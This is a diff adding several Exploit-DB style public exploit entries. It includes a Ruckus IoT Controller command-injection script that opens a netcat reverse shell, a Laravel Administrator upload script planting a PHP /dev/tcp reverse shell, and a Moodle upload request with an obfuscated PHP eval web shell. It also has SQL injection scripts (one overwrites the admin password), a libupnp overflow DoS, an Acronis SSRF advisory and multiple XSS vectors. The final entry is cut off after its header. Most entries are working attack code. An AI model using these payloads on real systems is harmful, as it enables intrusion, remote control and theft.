diff --git a/exploits/hardware/webapps/49110.py b/exploits/hardware/webapps/49110.py
new file mode 100755
index 000000000..25e34aa56
--- /dev/null
+++ b/exploits/hardware/webapps/49110.py
@@ -0,0 +1,101 @@
+# Product: Ruckus IoT Controller (Ruckus vRIoT)
+# Version: <= 1.5.1.0.21
+# Vendor: https://support.ruckuswireless.com/
+# Vulnerability: Command Injection & Broken Authentication
+# References: CVE-2020-26878
+# Discovered by: Juan Manuel Fernandez
+# Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
+# Exploit Author: Emre SUREN
+# Disclosure Date: 2020-10-26
+# Tested on: Appliance
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import requests, urllib3, sys
+from Crypto.Cipher import AES
+from base64 import b64encode, b64decode
+from colorama import Fore
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def listen(lhost, lport):
+	opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): "))
+	if opt == "y":
+		return True
+	else:
+		return False
+
+def generatePayload(lhost, lport):
+
+	payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #"
+
+	return payload
+
+def generateMagicToken():
+
+	enc_dec_method = 'utf-8'
+	salt = 'nplusServiceAuth'
+	salt = salt.encode("utf8")
+	str_key = 'serviceN1authent'
+	str_to_enc = 'TlBMVVMx'
+
+	return encrypt(enc_dec_method, salt, str_key, str_to_enc)
+
+def encrypt(enc_dec_method, salt, str_key, str_to_enc):
+
+	aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
+	hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
+	mret = b64encode(hx_enc).decode(enc_dec_method)
+
+	return mret
+
+def execCmd(rhost, rport, lhost, lport):
+
+	payload = generatePayload(lhost, lport)
+	post_data = {
+	   "username": payload,
+	   "password": "test"
+	}
+	print(Fore.BLUE + "[*] Payload\t: " + payload)
+
+	token = generateMagicToken()
+	headers = {
+		"Authorization": token
+	}
+
+	rpath = "/service/v1/createUser"
+	uri = 'https://' + rhost + ":" + rport + rpath
+
+	r = requests.post(uri, json=post_data, headers=headers, verify=False)
+	print(Fore.BLUE + "[*] Request sent")
+
+	if r.status_code == 200:    
+		print(Fore.GREEN + "[+] Successful. Check for the session...")
+	else:
+		print(Fore.RED + "[X] Failed. Check for the response...")
+		print(Fore.BLUE + "[*] Response\t: " + r.text)
+		sys.exit()
+
+def main():
+
+	if (len(sys.argv) != 5):
+		print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>")
+		print("[*] <RHOST> -> Target IP")
+		print("[*] <RPORT> -> Target Port")
+		print("[*] <LHOST> -> Attacker IP")
+		print("[*] <LPORT> -> Attacker Port")
+		print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0]))
+		exit(0)
+
+	rhost = sys.argv[1]
+	rport = sys.argv[2]
+	lhost = sys.argv[3]
+	lport = sys.argv[4]
+
+	if not listen(lhost, lport):
+		print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport))
+	else:
+		execCmd(rhost, rport, lhost, lport)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/linux/dos/49119.py b/exploits/linux/dos/49119.py
new file mode 100755
index 000000000..fc814a710
--- /dev/null
+++ b/exploits/linux/dos/49119.py
@@ -0,0 +1,18 @@
+# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
+# Date: 2020-08-20
+# Exploit Author: Patrik Lantz
+# Vendor Homepage: https://pupnp.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
+# Version: <= 1.6.6
+# Tested on: Linux
+# CVE : CVE-2012-5958
+
+import socket
+
+payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
+payload += "A"*324 + "BBBB"
+payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"
+
+byte_message = bytes(payload)
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.sendto(byte_message, ("239.255.255.250", 1900))
\ No newline at end of file
diff --git a/exploits/multiple/local/49108.txt b/exploits/multiple/local/49108.txt
new file mode 100644
index 000000000..aa42c62d4
--- /dev/null
+++ b/exploits/multiple/local/49108.txt
@@ -0,0 +1,26 @@
+# Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting
+# Date: 13.08.2020
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: https://www.sap.com
+# Software Link: SAP Lumira
+# Version: <= 1.31
+# Tested on: Windows 7 / Windows 10 / Internet Explorer 11 / Google Chrome 84.0.4147.105
+
+# Vulnerable System: https://system/BOE/BI
+
+# Reproduce Cross Site Scripting (XSS):
+
+1. Select Web Intelligence Button
+2. Wait for SAP Business Objects to load complete
+3. CTRL +N or click on New Document
+4. Create an empty document
+5. Select new variable
+6. Select random name for the variable
+7. Add the XSS vectors from evidence
+8. Open variable tab and click on new created variable name
+
+# Cross Site Scripting (XSS) Vectors Used:
+
+• "><h1><IFRAME SRC=#
+onmouseover="alert(document.cookie)"></IFRAME>123</h1>
+• <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49113.py b/exploits/multiple/webapps/49113.py
new file mode 100755
index 000000000..51f193f44
--- /dev/null
+++ b/exploits/multiple/webapps/49113.py
@@ -0,0 +1,87 @@
+# Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF
+# Date: 2020-07-30
+# Author: Julien Ahrens
+# Vendor Homepage: https://www.acronis.com
+# Version: 12.5 Build 16341
+# CVE: CVE-2020-16171
+
+VERSIONS AFFECTED
+====================
+Acronis Cyber Backup v12.5 Build 16327 and probably below.
+
+VULNERABILITY DETAILS
+========================
+All API endpoints running on port 9877 under "/api/ams/" whereof some are
+reachable without authentication, do accept an additional custom header called
+"Shard":
+
+def get_ams_address(headers):
+    if 'Shard' in headers:
+        [...]
+        return headers.get('Shard')  # Mobile agent >= ABC5.0
+
+The value of this header is afterwards to construct a separate web request send
+by the application using a urllib.request.urlopen call:
+
+def make_request_to_ams(resource, method, data=None):
+    port = config.CONFIG.get('default_ams_port', '9892')
+    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
+    logging.debug('Making request to AMS %s %s', method, uri)
+    headers = dict(request.headers)
+    del headers['Content-Length']
+    if not data is None:
+        headers['Content-Type'] = 'application/json'
+    req = urllib.request.Request(uri,
+                                 headers=headers,
+                                 method=method,
+                                 data=data)
+    resp = None
+    try:
+        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
+    except Exception as e:
+        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
+    return resp
+
+This can be abused to conduct SSRF attacks against otherwise unreachable internal hosts
+of Acronis services that are bound to localhost such as the "NotificationService" running
+on 127.0.0.1:30572 with a request header like:
+
+Shard: localhost:30572/external_email?
+
+For more details, see the referenced blog post.
+
+RISK
+=======
+The vulnerability can be used by an unauthenticated or authenticated attacker
+to query otherwise unreachable internal network resources. As demonstrated in
+the corresponding blog post, using this vulnerability, it is possible to i.e.
+(amongst others) send out fully customized emails or modify the application's
+resource settings.
+
+
+7. SOLUTION
+===========
+Update to v12.5 Build 16342 
+
+
+8. REPORT TIMELINE
+==================
+2020-07-30: Discovery of the vulnerability
+2020-07-30: Since the vulnerability is fixed in Cyber Protect: Sent out a
+            request to the Vendor to check whether Cyber Backup is EOL and users
+            are advised to migrate to Cyber Protect instead.
+2020-07-30: CVE requested from MITRE
+2020-07-31: MITRE assigns CVE-2020-16171
+2020-07-31: Public Disclosure date set to 2020-08-14
+2020-08-04: Vendor asks for a 90 days extension
+2020-08-04: Extension not granted because there is a fix available already. Public disclosure 
+            date set to 2020-09-14
+2020-09-05: Asking vendor about the status of the fix
+2020-09-08: Vendor states that a fix has been backported to Cyber Backup 12.5 under the 
+            reference ABR-202103
+2020-09-14: Public disclosure
+
+9. REFERENCES
+=============
+https://www.rcesecurity.com/2020/09/CVE-2020-16171-Exploiting-Acronis-Cyber-Backup-for-Fun-and-Emails/
+https://dl.acronis.com/u/backup/rn/12.5/user/en-US/AcronisBackup12.5_relnotes.htm
\ No newline at end of file
diff --git a/exploits/php/webapps/49107.txt b/exploits/php/webapps/49107.txt
new file mode 100644
index 000000000..b7cecddf2
--- /dev/null
+++ b/exploits/php/webapps/49107.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting
+# Date: 11/27/2020
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: http://demo.themeftc.com/wibar
+# Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798
+# Version: 1.1.8
+# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
+
+The WordPress theme contains Brands feature which is vulnerable to stored
+cross site scripting. The logo URL parameter is vulnerable to cross site
+scripting. The following vector was used for testing XSS: "><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>.
+
+In order to reproduce the vulnerability, please follow the next steps:
+
+1. Log in as editor/administrator/contributor/author:
+https://website.com/wp-admin
+2. Go to Brands section
+3. Click add new brand and add a custom brand title
+4. The vulnerable parameter is: Logo URL / <input type="text"
+name="ftc_brand_url" id="ftc_brand_url" value="">
+5. Add the following payload: "><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> , where
+base64 == alert(document.domain)
+6. Publish
+7. The alert will pop up when a user will visit the website on
+https://website.com/brand/vulnerablebrand.
+
+Evidence:
+
+1. https://ibb.co/1fpYJWN
+2. https://ibb.co/S7j5Sgd
+
+C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L / 7.5 High
\ No newline at end of file
diff --git a/exploits/php/webapps/49109.txt b/exploits/php/webapps/49109.txt
new file mode 100644
index 000000000..b33eeb888
--- /dev/null
+++ b/exploits/php/webapps/49109.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting
+# Google Dork: "WonderCMS"
+# Date: 2020-11-27
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Vendor Homepage: https://www.wondercms.com/
+# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
+# Version: 3.1.3
+# Tested on: Ubuntu 20.10
+
+Steps-To-Reproduce:
+1. Login and select button setting
+2. Go to tab Files, and upload file contains payload xss with extension like html, svg, htm
+3. Go to http://target.lc/data/files/<name-file> and trigger XSS
+
+POST /home HTTP/1.1
+Host: wordpress.lc:8081
+Content-Length: 372
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://wordpress.lc:8081
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundary6EKP5vjUNS5Icgql
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://wordpress.lc:8081/
+Accept-Encoding: gzip, deflate
+Accept-Language: vi,vi-VN;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=74me71gverejuaf2bns2n5fpkf
+Connection: close
+
+------WebKitFormBoundary6EKP5vjUNS5Icgql
+Content-Disposition: form-data; name="uploadFile"; filename="xss.html"
+Content-Type: text/html
+
+<script>alert('XSS')</script>
+------WebKitFormBoundary6EKP5vjUNS5Icgql
+Content-Disposition: form-data; name="token"
+
+5d715f2aebdf138f4968fce8dcd3703778c6fb5a1abea40e27eb9280079474da
+------WebKitFormBoundary6EKP5vjUNS5Icgql--
+
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/49112.py b/exploits/php/webapps/49112.py
new file mode 100755
index 000000000..906209983
--- /dev/null
+++ b/exploits/php/webapps/49112.py
@@ -0,0 +1,54 @@
+# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
+# Author: Victor Campos and Xavi Beltran
+# Contact: vcmartin@protonmail.com
+# Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/
+# Date: 25/3/2020
+# Software link: https://github.com/FrozenNode/Laravel-Administrator/
+# Version : 4
+# Tested on: Laravel-Administrator 4
+# CVE : CVE-2020-10963
+
+#!/usr/bin/env python
+
+import requests,json,traceback
+from requests.auth import HTTPBasicAuth
+
+
+#Parameters to be set up (ENTER YOUR VALUES)
+#===========================================
+# Listener IP and port
+ip = ""
+port = ""
+#Admin credentials
+user = ""
+password = ""
+#URLs of the web application
+domain = "" # For example "https://www.example.com"
+login_url = "" # For example "/user/login"
+fileupload_url = "" # For example "/admin/categories/image/file_upload"
+uploaded_files_url = "" # For example "/categories/images"
+
+
+
+#Reverse shell payload (DO NOT MODIFY THIS SECTION)
+#==================================================
+#GIF file header
+shell = "GIF89a\r\n"
+#php reverse shell
+shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n"
+
+
+with requests.Session() as s:
+    try:
+        print("\n[+] Logging into the panel")
+        s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'})
+        print("[+] Uploading the malicious file")
+        r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)})
+        print("[+] Response text:")
+        #print(r.text)
+        shell_file = (json.loads(r.text))["filename"]
+        print("[+] Name of uploaded file: " + shell_file)
+        print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...")
+        r = s.get(domain + uploaded_files_url + '/' + shell_file)
+    except Exception as e:
+        print(str(traceback.format_exc()))
\ No newline at end of file
diff --git a/exploits/php/webapps/49114.txt b/exploits/php/webapps/49114.txt
new file mode 100644
index 000000000..0e123c160
--- /dev/null
+++ b/exploits/php/webapps/49114.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Moodle 3.8 - Unrestricted File Upload
+# Date: 2019-09-08
+# Exploit Author: Sirwan Veisi
+# Vendor Homepage: https://moodle.org/
+# Software Link: https://github.com/moodle/moodle
+# Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4...
+# Tested on: Moodle Version 3.8
+# CWE : CWE-434
+
+I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that
+allows the attacker to upload or transfer files of dangerous types.
+
+
+Example exploitation request:
+
+POST /repository/repository_ajax.php?action=upload HTTP/1.1
+Host: VulnerableHost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
+Gecko/20100101 Firefox/80.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------38898830537874132223151601680
+Content-Length: 2763
+Origin: https://VulnerableHost
+Connection: close
+Referer: https://VulnerableHost/user/files.php
+Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai
+Upgrade-Insecure-Requests: 1
+
+-----------------------------38898830537874132223151601680
+Content-Disposition: form-data; name="repo_upload_file";
+filename="image.php"
+Content-Type: image/jpeg
+
+GIF89a;
+<?php
+$Q=str_replace('kz','','crekzakztkze_kzfunckztkzion');
+$O='"";for%(%$i=%0;$i<$l;){for%($j=0%;($j<$c&%&$i<$l);$%j++,$i+%+%){$o.=$%t{$i';
+$l='_contents(%"php:%//input"),%$m)=%=1){@ob%_start();%@eva%l(@gzunc%o%mpress(%@';
+$C='$k="3%fbd6%8c8"%;$kh="2a%e%7d638909f";$%kf%="60eb0ffaeb%1%7";$p="dP%FT1%';
+$h='x(@b%ase%6%4_decode($m[1%]),$k)));%$o=@o%b_get_conte%%nts();@ob_end%%_c%lean';
+$N='}%%^$k{$j};}}retu%rn
+$o;}i%f(@preg%_matc%%h("/$kh(.+)$%%k%f%/",@file_ge%t';
+$e='Nmy694Bcj%Vc";fu%nction%
+x(%$t,$k){$c=st%rle%n%($%%k);$l=strlen($t)%;$o=';
+$V='();$r=@bas%e64_en%cod%e(@x(@%%gzcomp%ress($o),$k))%;%print("$%p$kh$r$kf");}';
+$P=str_replace('%','',$C.$e.$O.$N.$l.$h.$V);
+$n=$Q('',$P);$n();
+?>
+
+-----------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/49115.txt b/exploits/php/webapps/49115.txt
new file mode 100644
index 000000000..78e58c1c6
--- /dev/null
+++ b/exploits/php/webapps/49115.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
+# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
+# Google Dork: N/A
+# Date: 2020-08-24
+# Vendor Homepage: https://accesspressthemes.com
+# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
+# Version: <= 1.7.9
+# Tested on: Ubuntu 18.04
+
+Description:
+A blind SQL injection vulnerability is present in Ajax load more.
+
+<?php
+$si_id = esc_attr($atts['id']);
+global $wpdb;
+$table_name = $table_name = $wpdb->prefix . "aps_social_icons";
+$icon_sets = $wpdb->get_results("SELECT * FROM $table_name where si_id =
+$si_id");
+
+POC:
+POST /wordpress/index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F66&_locale=user
+HTTP/1.1
+Host: pwnme.me
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101
+Firefox/79.0
+Accept: application/json, */*;q=0.1
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://pwnme.me/wordpress/wp-admin/post.php?post=66&action=edit
+X-WP-Nonce: 514cd2ab3f
+X-HTTP-Method-Override: PUT
+Content-Type: application/json
+Origin: http://pwnme.me
+Content-Length: 103
+Connection: close
+Cookie: wp-settings-time-2=1597912773;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=author%7C1598405206%7Cwp7Nu56SQz9nIWmkqZr94WFIpGZ6VfcTT5KaYPUULWe%7C3c4c3a80cbfd049b95b04a6104ded9b05f33f8a9900ccec818d5aa43c7102c79;
+wp-settings-time-3=1598234126
+
+{"id":66,"content":"<!-- wp:shortcode -->\n[aps-social id=\"4 and
+sleep(5)\"]\n<!-- /wp:shortcode -->"}
\ No newline at end of file
diff --git a/exploits/php/webapps/49117.txt b/exploits/php/webapps/49117.txt
new file mode 100644
index 000000000..c13a419be
--- /dev/null
+++ b/exploits/php/webapps/49117.txt
@@ -0,0 +1,94 @@
+# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection
+# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) 
+# Date: 2020-08-07
+# Vendor Homepage: https://projectworlds.in
+# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7
+# CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
+# OWASP Top Ten 2017: A1:2017-Injection
+# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
+# CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+# Vulnerability Description:
+#   House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers
+#   to execute arbitrary code on the hosting webserver via sending a malicious POST request.
+# Vulnerable Source Code:
+# /config/config.php
+#   11  try {
+#   12     $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass);
+#   13     $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
+# /index.php
+#    5   if(isset($_POST['search'])) {
+#    7     $keywords = $_POST['keywords'];
+#   11     $keyword = explode(',', $keywords);
+#   12     $concats = "(";
+#   13     $numItems = count($keyword);
+#   15     foreach ($keyword as $key => $value) {
+#   17       if(++$i === $numItems){
+#   18          $concats .= "'".$value."'";
+#   19       }else{
+#   20         $concats .= "'".$value."',";
+#   23     $concats .= ")";
+#   47         $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats");
+#   48         $stmt->execute();
+
+import requests, sys, re, json
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
+S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
+ok   = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
+err  = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
+
+
+def sig():
+    SIG  = F[2]+"    .-----.._       ,--.              "+F[5]+"  .__              .__________\n"
+    SIG += F[2]+"    |  ..    >  "+F[4]+"___"+F[2]+" |  | .--.         "+F[5]+"  |  |__ ___.__. __| _\\_____  \\  ______ ____  ____\n"
+    SIG += F[2]+"    |  |.'  ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/  /__   __   "+F[5]+"  |  |  <   |  |/ __ |  _(__  < /  ____/ __ _/ ___\\\n"
+    SIG += F[2]+"    |      <"+F[4]+"/ "+F[2]+"*  *  *"+F[4]+" \\   "+F[2]+"/   \\/   \\  "+F[5]+"  |   Y  \\___  / /_/ | /       \\\\___ \\\\  ___\\  \\___\n"
+    SIG += F[2]+"    |  |>   )   "+F[2]+"* *"+F[4]+"   /    "+F[2]+"\\        \\ "+F[5]+"  |___|  / ____\____ |/______  /____  >\\___  \\___  >\n"
+    SIG += F[2]+"    |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+"       \\/\\/         \\/       \\/     \\/     \\/    \\/\n"
+    SIG += F[2]+"        "+F[2]+"_______github.com/boku7_____  "+F[5]+"         _______github.com/hyd3sec____\n_"+F[0]+S[0]
+    return SIG
+
+
+
+def header():
+    head = S[3]+F[2]+'       ---  House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0]
+    return head
+
+def formatHelp(STRING):
+    return S[3]+F[2]+STRING+S[0]
+
+if __name__ == "__main__":
+    print(header())
+    print(sig())
+    if len(sys.argv) != 2:
+        print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
+        print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0]))
+        sys.exit(-1)
+    SERVER_URL  = sys.argv[1]
+    if not re.match(r".*/$", SERVER_URL):
+        SERVER_URL = SERVER_URL+'/'
+    INDEX_URL   = SERVER_URL + 'index.php'
+    EXECUTE_URL = SERVER_URL + 'execute.php'
+    LOGIN_URL   = SERVER_URL + 'auth/login.php'
+    s = requests.Session()
+    get_session = s.get(INDEX_URL, verify=False) 
+    pdata       = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'}
+    SQLi        = s.post(url=INDEX_URL, data=pdata, verify=False)
+    if SQLi.status_code == 200:
+        print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":")
+        print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0])
+    else:
+        print(err+'Cannot send payload to webserver.')
+        sys.exit(-1)
+    try:
+        print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0])
+        EXECUTE     = s.get(url=EXECUTE_URL, verify=False)
+    except:
+        print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload')
+        sys.exit(-1)
+    print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0])
+    print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])
\ No newline at end of file
diff --git a/exploits/php/webapps/49121.txt b/exploits/php/webapps/49121.txt
new file mode 100644
index 000000000..e70daf6c7
--- /dev/null
+++ b/exploits/php/webapps/49121.txt
@@ -0,0 +1,46 @@
+# Exploit Title: ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
+# Date: 2020-08-22
+# Exploit Author: Vyshnav NK
+# Vendor Homepage: https://www.elkarbackup.org/
+# Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation
+# Version: 1.3.3
+# Tested on: Linux
+
+Reproduction Steps: 
+
+1 - Go to the elakarbackup/login
+2 - Login with default credentials
+3 - Go to Policies >> Action >> Edit any of the existing Policies >> Insert XSS Payload in Paramter "Policy[name] and Policy[Description]"
+4 - Click on Save 
+5 - We can see the Javacript Code executed Sucessfully 
+
+
+XSS Attack vectors :
+
+"><svg/onload=alert(4)>
+"><svg/onload=alert(document.cookie)>
+
+
+
+Request : 
+
+POST /policy/1 HTTP/1.1
+Host: ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1123
+Origin: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
+Connection: close
+Referer: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com/policy/1?
+Cookie: PHPSESSID=03e0bcfa5864ffe758916b5e171c1505
+Upgrade-Insecure-Requests: 1
+
+Policy%5Bname%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Bdescription%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BhourlyHours%5D=12%3A00%7C15%3A00%7C21%3A00&Policy%5BhourlyDaysOfMonth%5D=&Policy%5BhourlyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BhourlyMonths%5D=&Policy%5BhourlyCount%5D=0&Policy%5BdailyHours%5D=21%3A00&Policy%5BdailyDaysOfMonth%5D=&Policy%5BdailyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BdailyMonths%5D=&Policy%5BdailyCount%5D=5&Policy%5BweeklyHours%5D=21%3A00&Policy%5BweeklyDaysOfMonth%5D=&Policy%5BweeklyDaysOfWeek%5D=1&Policy%5BweeklyMonths%5D=&Policy%5BweeklyCount%5D=4&Policy%5BmonthlyHours%5D=21%3A00&Policy%5BmonthlyDaysOfMonth%5D=1&Policy%5BmonthlyDaysOfWeek%5D=&Policy%5BmonthlyMonths%5D=&Policy%5BmonthlyCount%5D=12&Policy%5ByearlyHours%5D=21%3A00&Policy%5ByearlyDaysOfMonth%5D=&Policy%5ByearlyDaysOfWeek%5D=&Policy%5ByearlyMonths%5D=&Policy%5ByearlyCount%5D=0&Policy%5Bexclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Binclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BsyncFirst%5D=1&Policy%5B_token%5D=B6JELPCVSHiZrMvyEeeBdRMLYSKBWfUMUwBeLWw8XpI&weekly-day=on
+
+
+Response :
+
+<form data-bnv-message="Really delete policy "><svg/onload=alert(4)>?" class="delete-policy" action="/policy/1/delete" method="POST" style="display:inline">
\ No newline at end of file
diff --git a/exploits/php/webapps/49122.txt b/exploits/php/webapps/49122.txt
new file mode 100644
index 000000000..11898f31d
--- /dev/null
+++ b/exploits/php/webapps/49122.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
+# Google Dork: "Powered By Best Support System"
+# Date: 2020-08-23
+# Exploit Author: Ex.Mi [ https://ex-mi.ru ]
+# Vendor: Appsbd [ https://appsbd.com ]
+# Software Version: 3.0.4
+# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
+# Tested on: Kali Linux
+# CVE: CVE-2020-24963
+# CWE: CWE-79
+
+
+[i] :: Info:
+
